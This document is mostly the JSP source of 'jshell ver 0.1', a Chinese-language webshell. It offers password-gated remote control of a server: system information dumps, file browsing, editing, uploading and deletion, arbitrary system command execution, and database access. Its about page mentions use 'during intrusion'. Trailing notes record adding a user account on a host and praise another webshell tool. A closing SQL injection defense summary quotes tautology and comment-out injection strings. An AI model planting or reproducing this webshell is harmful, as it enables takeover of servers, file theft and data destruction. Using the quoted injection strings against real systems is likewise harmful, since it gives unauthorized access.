value="dDwtMTQyNDQzOTM1NDt0PDtsPGk8OT47PjtsPHQ8cDxsPGVuY3R5cGU7PjtsPG11bHRpcGFydC9mb3JtLWRhdGE7Pj47bDxpPDE5Pjs+O2w8dDxAMDw7Ozs7Ozs7Ozs7Pjs7Pjs+Pjs+PjtsPE5ld0ZpbGU7TmV3RmlsZTtOZXdEaXJlY3Rvcnk7TmV3RGlyZWN0b3J5O0RCX3JCX01TU1FMO0RCX3JCX01TU1FMO0RCX3JCX0FjY2VzcztEQl9yQl9BY2Nlc3M7Pj7Z5iNIVOaWZWuK0pv8lCMSbhytgQ==" /> <script language="javascript" type="text/javascript"> <!-- function __doPostBack(eventTarget, eventArgument) { var theform; if (window.navigator.appName.toLowerCase().indexOf("microsoft") > -1) { theform = document.Form1; } else { theform = document.forms["Form1"]; } theform.__EVENTTARGET.value = eventTarget.split("$").join(":"); theform.__EVENTARGUMENT.value = eventArgument; theform.submit(); } // --> </script> <tr> <td height="30" align="center" class="td2" colspan="2"> <input name="password" type="password" class="textbox" id="Textbox" /> <input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" /> </td> </tr> </form> <SCRIPT type='text/javascript' language='javascript' src='http://xslt.alexa.com/site_stats/js/t/c?url='></SCRIPT> </TABLE></td> </tr> </TABLE> </div> <% //================================================================================================ // end of the login form } else { String password = null; if (session.getAttribute("password") == null) { password = (String)request.getParameter("password"); if (validate(password) == false) { out.println("<div align=\"center\"><font color=\"red\"><li>哎呀,倒霉死啦!</font></div>"); out.close(); return; } session.setAttribute("password", password); } else { password = (String)session.getAttribute("password"); } String action = null; if (request.getParameter("action") == null) action = "main"; else action = (String)request.getParameter("action"); if (action.equals("exit")) { session.removeAttribute("password"); response.sendRedirect(request.getRequestURI()); out.close(); return; } // show the main menu //==================================================================================== %> <table align="center" width="600" border="0" cellpadding="2" cellspacing="0"> <form name="form1" method="get"> <tr bgcolor="#CCCCCC"> <td id="title"><!--[程序首页]--></td> <td align="right"> <select name="action" onChange="javascript:changeAction(document.form1)"> <option value="main">程序首页</option> <option value="filesystem">文件系统</option> <option value="command">系统命令</option> <option value="database">数据库</option> <option value="config">程序配置</option> <option value="about">关于程序</option> <option value="exit">退出程序</option> </select> <script language="JavaScript"> <% out.println("var action = \"" + action + "\""); %> var sAction = document.form1.action; for (var i = 0; i < sAction.length; i ++) { if (sAction[i].value == action) { sAction[i].selected = true; //title.innerHTML = "[" + sAction[i].innerHTML + "]"; } } </script> </td> </tr> </form> </table> <% //===================================================================================== // end of main menu if (action.equals("main")) { // print the system info table //======================================================================================= %> <table align="center" width="600" cellpadding="2" cellspacing="1" border="0" bgcolor="#CCCCCC"> <tr bgcolor="#FFFFFF"> <td colspan="2" align="center">服务器信息</td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">服务器名</td> <td align="center" class="datarows"><%=request.getServerName()%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">服务器端口</td> <td align="center" class="datarows"><%=request.getServerPort()%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">操作系统</td> <td align="center" class="datarows"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">当前用户名</td> <td align="center" class="datarows"><%=System.getProperty("user.name")%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">当前用户目录</td> <td align="center" class="datarows"><%=System.getProperty("user.home")%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">当前用户工作目录</td> <td align="center" class="datarows"><%=System.getProperty("user.dir")%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">程序相对路径</td> <td align="center" class="datarows"><%=request.getRequestURI()%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">程序绝对路径</td> <td align="center" class="datarows"><%=request.getRealPath(request.getServletPath())%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">网络协议</td> <td align="center" class="datarows"><%=request.getProtocol()%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">服务器软件版本信息</td> <td align="center" class="datarows"><%=application.getServerInfo()%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">JDK版本</td> <td align="center" class="datarows"><%=System.getProperty("java.version")%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">JDK安装路径</td> <td align="center" class="datarows"><%=System.getProperty("java.home")%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">JAVA虚拟机版本</td> <td align="center" class="datarows"><%=System.getProperty("java.vm.specification.version")%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">JAVA虚拟机名</td> <td align="center" class="datarows"><%=System.getProperty("java.vm.name")%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">JAVA类路径</td> <td align="center" class="datarows"><%=System.getProperty("java.class.path")%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">JAVA载入库搜索路径</td> <td align="center" class="datarows"><%=System.getProperty("java.library.path")%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">JAVA临时目录</td> <td align="center" class="datarows"><%=System.getProperty("java.io.tmpdir")%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">JIT编译器名</td> <td align="center" class="datarows"><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">扩展目录路径</td> <td align="center" class="datarows"><%=System.getProperty("java.ext.dirs")%></td> </tr> <tr bgcolor="#FFFFFF"> <td colspan="2" align="center">客户端信息</td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">客户机地址</td> <td align="center" class="datarows"><%=request.getRemoteAddr()%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">服务机器名</td> <td align="center" class="datarows"><%=request.getRemoteHost()%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">用户名</td> <td align="center" class="datarows"><%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">请求方式</td> <td align="center" class="datarows"><%=request.getScheme()%></td> </tr> <tr bgcolor="#FFFFFF"> <td width="300" align="center" class="datarows">应用安全套接字层</td> <td align="center" class="datarows"><%=request.isSecure() == true ? "是" : "否"%></td> </tr> </table> <% //======================================================================================= // end of printing the system info table ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// } else if (action.equals("filesystem")) { String curPath = ""; String result = ""; String fsAction = ""; if (request.getParameter("curPath") == null) { curPath = request.getRealPath(request.getServletPath()); curPath = pathConvert((new File(curPath)).getParent()); } else { curPath = Unicode2GB((String)request.getParameter("curPath")); } if (request.getParameter("fsAction") == null) { fsAction = "list"; } else { fsAction = (String)request.getParameter("fsAction"); } if (fsAction.equals("list")) result = listFiles(curPath, request.getRequestURI() + "?action=" + action); else if (fsAction.equals("browse")) { result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action); result += browseFile(curPath); } else if (fsAction.equals("open")) result = openFile(curPath, request.getRequestURI() + "?action=" + action); else if (fsAction.equals("save")) { if (request.getParameter("fileContent") == null) { result = "<font color=\"red\">页面导航错误</font>"; } else { String fileContent = Unicode2GB((String)request.getParameter("fileContent")); result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent); } } else if (fsAction.equals("createFolder")) { if (request.getParameter("folderName") == null) { result = "<font color=\"red\">目录名不能为空</font>"; } else { String folderName = Unicode2GB(request.getParameter("folderName").trim()); if (folderName.equals("")) { result = "<font color=\"red\">目录名不能为空</font>"; } else { result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName); } } } else if (fsAction.equals("createFile")) { if (request.getParameter("fileName") == null) { result = "<font color=\"red\">文件名不能为空</font>"; } else { String fileName = Unicode2GB(request.getParameter("fileName").trim()); if (fileName.equals("")) { result = "<font color=\"red\">文件名不能为空</font>"; } else { result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName); } } } else if (fsAction.equals("deleteFile")) { if (request.getParameter("filesDelete") == null) { result = "<font color=\"red\">没有选择要删除的文件</font>"; } else { String[] files2Delete = (String[])request.getParameterValues("filesDelete"); if (files2Delete.length == 0) { result = "<font color=\"red\">没有选择要删除的文件</font>"; } else { for (int n = 0; n < files2Delete.length; n ++) { files2Delete[n] = Unicode2GB(files2Delete[n]); } result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete); } } } else if (fsAction.equals("saveAs")) { if (request.getParameter("fileContent") == null) { result = "<font color=\"red\">页面导航错误</font>"; } else { String fileContent = Unicode2GB(request.getParameter("fileContent")); result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent); } } else if (fsAction.equals("upload")) { result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); } else if (fsAction.equals("copyto")) { if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) { result = "<font color=\"red\">没有选择要复制的文件</font>"; } else { String[] files2Copy = request.getParameterValues("filesDelete"); String dstPath = request.getParameter("dstPath").trim(); if (files2Copy.length == 0) { result = "<font color=\"red\">没有选择要复制的文件</font>"; } else if (dstPath.equals("")) { result = "<font color=\"red\">没有填写要复制到的目录路径</font>"; } else { for (int i = 0; i < files2Copy.length; i ++) files2Copy[i] = Unicode2GB(files2Copy[i]); result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath)); } } } else if (fsAction.equals("rename")) { if (request.getParameter("fileRename") == null) { result = "<font color=\"red\">页面导航错误</font>"; } else { String file2Rename = request.getParameter("fileRename").trim(); String newName = request.getParameter("newName").trim(); if (file2Rename.equals("")) { result = "<font color=\"red\">没有选择要重命名的文件</font>"; } else if (newName.equals("")) { result = "<font color=\"red\">没有填写新文件名</font>"; } else { result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName)); } } } %> <table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC"> <form method="post" name="form2" action="<%= request.getRequestURI() + "?action=" + action%>"> <tr bgcolor="#FFFFFF"> <td align="center">地址 <input type="text" size="80" name="curPath" class="textbox" value="<%=curPath%>" /> <input type="submit" value="转到" class="button" /></td> </tr> </form> <tr bgcolor="#FFFFFF"> <td><%= result.trim().equals("")?" " : result%></td> </tr> </table> <% ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// } else if (action.equals("command")) { String cmd = ""; InputStream ins = null; String result = ""; if (request.getParameter("command") != null) { cmd = (String)request.getParameter("command"); result = exeCmd(cmd); } // print the command form //======================================================================================== %> <table border="0" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC" align="center"> <form name="form2" method="post" action="<%=request.getRequestURI() + "?action=" + action%>"> <tr bgcolor="#FFFFFF"> <td align="center">执行命令</td> </tr> <tr bgcolor="#FFFFFF"> <td align="center"> <input type="text" class="textbox" size="80" name="command" value="<%=cmd%>" /> <input type="submit" class="button" value="执行" /> </td> </tr> <tr bgcolor="#FFFFFF"> <td align="center">执行结果</td> </tr> </form> </table> <table align="center" width="600" border="0"> <tr> <td><%=result == "" ? " " : result%></td> </tr> </table> <% //========================================================================================= // end of printing command form /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// } else if (action.equals("database")) { String dbAction = ""; String result = ""; String dbType = ""; String dbServer = ""; String dbPort = ""; String dbUsername = ""; String dbPassword = ""; String dbName = ""; String dbResult = ""; String sql = ""; if (request.getParameter("dbAction") == null) { dbAction = "main"; } else { dbAction = request.getParameter("dbAction").trim(); if (dbAction.equals("")) dbAction = "main"; } if (dbAction.equals("main")) { result = " "; } else if (dbAction.equals("dbConnect")) { if (request.getParameter("dbType") == null || request.getParameter("dbServer") == null || request.getParameter("dbPort") == null || request.getParameter("dbUsername") == null || request.getParameter("dbPassword") == null || request.getParameter("dbName") == null) { response.sendRedirect(request.getRequestURI() + "?action=" + action); } else { dbType = request.getParameter("dbType").trim(); dbServer = request.getParameter("dbServer").trim(); dbPort = request.getParameter("dbPort").trim(); dbUsername = request.getParameter("dbUsername").trim(); dbPassword = request.getParameter("dbPassword").trim(); dbName = request.getParameter("dbName").trim(); if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) { if (DBConnect(dbUsername, dbPassword)) { if (request.getParameter("sql") != null) { sql = request.getParameter("sql").trim(); if (! sql.equals("")) { dbResult = DBExecute(sql); } } result = "<script language=\"javascript\">\n"; result += "<!--\n"; result += "function exeSql() {\n"; result += " if (ltrim(document.dbInfo.sql.value) != \"\")\n"; result += " document.dbInfo.submit();"; result += "}\n"; result += "\n"; result += "function resetIt() {\n"; result += " document.dbInfo.sql.value = \"\";"; result += "}\n"; result += "//-->\n"; result += "</script>\n"; result += "sql语句<br/><textarea name=\"sql\" cols=\"70\" rows=\"6\">" + sql + "</textarea><br/><input type=\"submit\" class=\"button\" onclick=\"javascript:exeSql()\" value=\"执行\"/> <input type=\"reset\" class=\"button\" onclick=\"javascript:resetIt()\" value=\"清空\"/>\n"; DBRelease(); } else { result = "<font color=\"red\">数据库连接失败</font>"; } } else { result = "<font color=\"red\">数据库连接驱动没有找到</font>"; } } } %> <script language="javascript"> <!-- <% out.println("var selectedType = \"" + dbType + "\";"); %> //--> </script> <table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC"> <form name="dbInfo" method="post" action="<%=request.getRequestURI() + "?action=" + action + "&dbAction=dbConnect"%>"> <tr bgcolor="#FFFFFF"> <td width="300" align="center">数据库连接类型</td> <td align="center"> <select name="dbType"> <option value="sqlserver">SQLServer数据库</option> <option value="mysql">MySql数据库</option> <option value="oracle">Oracle数据库</option> <option value="db2">DB2数据库</option> <option value="odbc">ODBC数据源</option> </select> <script language="javascript"> for (var i = 0; i < document.dbInfo.dbType.options.length; i ++) { if (document.dbInfo.dbType.options[i].value == selectedType) { document.dbInfo.dbType.options[i].selected = true; } } </script> </td> </tr> <tr bgcolor="#FFFFFF"> <td align="center">数据库服务器地址</td> <td align="center"><input type="text" name="dbServer" class="textbox" value="<%=dbServer%>" style="width:150px;" /></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center">数据库服务器端口</td> <td align="center"><input type="text" name="dbPort" class="textbox" value="<%=dbPort%>" style="width:150px;" /></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center">数据库用户名</td> <td align="center"><input type="text" name="dbUsername" class="textbox" value="<%=dbUsername%>" size="20" style="width:150px;" /></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center">数据库密码</td> <td align="center"><input type="password" name="dbPassword" class="textbox" value="<%=dbPassword%>" size="20" style="width:150px;" /></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center">数据库名</td> <td align="center"><input type="text" name="dbName" class="textbox" value="<%=dbName%>" size="20" style="width:150px;" /></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center" colspan="2"><input type="submit" value="连接" class="button" /> <input type="reset" value="重置" class="button" /></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center" colspan="2"><%=result%></td> </tr> </form> </table> <table align="center" width="100%" border="0"> <tr> <td align="center"> <%=dbResult%> </td> </tr> </table> <% //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// } else if (action.equals("config")) { String cfAction = ""; int i; if (request.getParameter("cfAction") == null) { cfAction = "main"; } else { cfAction = request.getParameter("cfAction").trim(); if (cfAction.equals("")) cfAction = "main"; } if (cfAction.equals("main")) { // start of config form //========================================================================================== %> <script language="javascript"> <!-- function delFileType() { document.config.newType.value = document.config.textFileTypes[document.config.textFileTypes.selectedIndex].value; document.config.textFileTypes.options.remove(document.config.textFileTypes.selectedIndex); } function addFileType() { if (document.config.newType.value != "") { var oOption = document.createElement("OPTION"); document.config.textFileTypes.options.add(oOption); oOption.value = document.config.newType.value; oOption.innerHTML = document.config.newType.value; } } function selectAllTypes() { for (var i = 0; i < document.config.textFileTypes.options.length; i ++) { document.config.textFileTypes.options[i].selected = true; } } //--> </script> <table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC"> <form name="config" method="post" action="<%=request.getRequestURI() + "?action=config&cfAction=save"%>" onSubmit="javascript:selectAllTypes()"> <tr bgcolor="#FFFFFF"> <td align="center" width="200">密码</td> <td><input type="text" size="30" name="password" class="textbox" value="<%=_password%>" /></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center">系统编码</td> <td><input type="text" size="30" name="encode" value="<%=_encodeType%>" class="textbox" /></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center">Session超时时间</td> <td><input type="text" size="5" name="sessionTime" class="textbox" value="<%=_sessionOutTime%>" /></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center">可编辑文件类型</td> <td> <table border="0" width="190" cellpadding="0" cellspacing="0"> <tr> <td> <input type="text" size="11" class="textbox" name="newType" /> </td> <td align="center"> <input type="button" onClick="javascript:delFileType()" value="<<" class="button" /> <p></p> <input type="button" value=">>" onClick="javascript:addFileType()" class="button" /> </td> <td align="right"> <select name="textFileTypes" size="4" style="width: 87px" multiple="true"> <% for (i = 0; i < _textFileTypes.length; i ++) { %> <option value="<%=_textFileTypes[i]%>"><%=_textFileTypes[i]%></option> <% } %> </select> </td> </tr> </table> </td> </tr> <tr bgcolor="#FFFFFF"> <td align="center" colspan="2"><input type="submit" value="保存" class="button" /></td> </tr> </form> </table> <% } else if (cfAction.equals("save")) { if (request.getParameter("password") == null || request.getParameter("encode") == null || request.getParameter("sessionTime") == null || request.getParameterValues("textFileTypes") == null) { response.sendRedirect(request.getRequestURI()); } String result = ""; String newPassword = request.getParameter("password").trim(); String newEncodeType = request.getParameter("encode").trim(); String newSessionTime = request.getParameter("sessionTime").trim(); String[] newTextFileTypes = request.getParameterValues("textFileTypes"); String jshellPath = request.getRealPath(request.getServletPath()); try { JshellConfig jconfig = new JshellConfig(jshellPath); jconfig.setPassword(newPassword); jconfig.setEncodeType(newEncodeType); jconfig.setSessionTime(newSessionTime); jconfig.setTextFileTypes(newTextFileTypes); jconfig.save(); result += "设置保存成功,正在返回,请稍候……"; result += "<meta http-equiv=\"refresh\" content=\"2;url=" + request.getRequestURI() + "?action=" + request.getParameter("action") + "\">"; } catch (JshellConfigException e) { result = "<font color=\"red\">" + e.getMessage() + "</font>"; } %> <table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC"> <tr bgcolor="#FFFFFF"> <td><%=result == "" ? " " : result%></td> </tr> </table> <% } ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// //========================================================================================== // end of config form } else if (action.equals("about")) { // start of about //========================================================================================== %> <table border="0" align="center" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC"> <tr bgcolor="#FFFFFF"> <td align="center">关于 jshell ver 0.1</td> </tr> <tr bgcolor="#FFFFFF"> <td> 增加了显示alxea排名的功能,这对于入侵中也比较方便些,版权还是归作者的.</td> </tr> <tr bgcolor="#FFFFFF"> <td align="right">hack520 by <a href="mailto:[email protected]">hack520</a> and welcome to <a href="http://www.GOOGLE.com" target="_blank">FCHK</a></td> </tr> </table> <% //========================================================================================== } } %> </body> </html>
我运行useradd hao
菜刀工具还是最好用的。
总结:sql注入
第一:替换单引号,即把所有单独出现的单引号改成两个单引号,防止攻击者修改SQL命令的含义。再来看前面的例子,“SELECT * from Users WHERE login = ''' or ''1''=''1' AND password = ''' or ''1''=''1'”显然会得到与“SELECT * from Users WHERE login = '' or '1'='1' AND password = '' or '1'='1'”不同的结果。
第二:删除用户输入内容中的所有连字符,防止攻击者构造出类如“SELECT * from Users WHERE login = 'mas' -- AND password =''”之类的查询,因为这类查询的后半部分已经被注释掉,不再有效,攻击者只要知道一个合法的用户登录名称,根本不需要知道用户的密码就可以顺利获得访问权限。
第三:对于用来执行查询的数据库帐户,限制其权限。用不同的用户帐户执行查询、插入、更新、删除操作。由于隔离了不同帐户可执行的操作,因而也就防止了原本用于执行SELECT命令的地方却被用于执行INSERT、UPDATE或DELETE命令。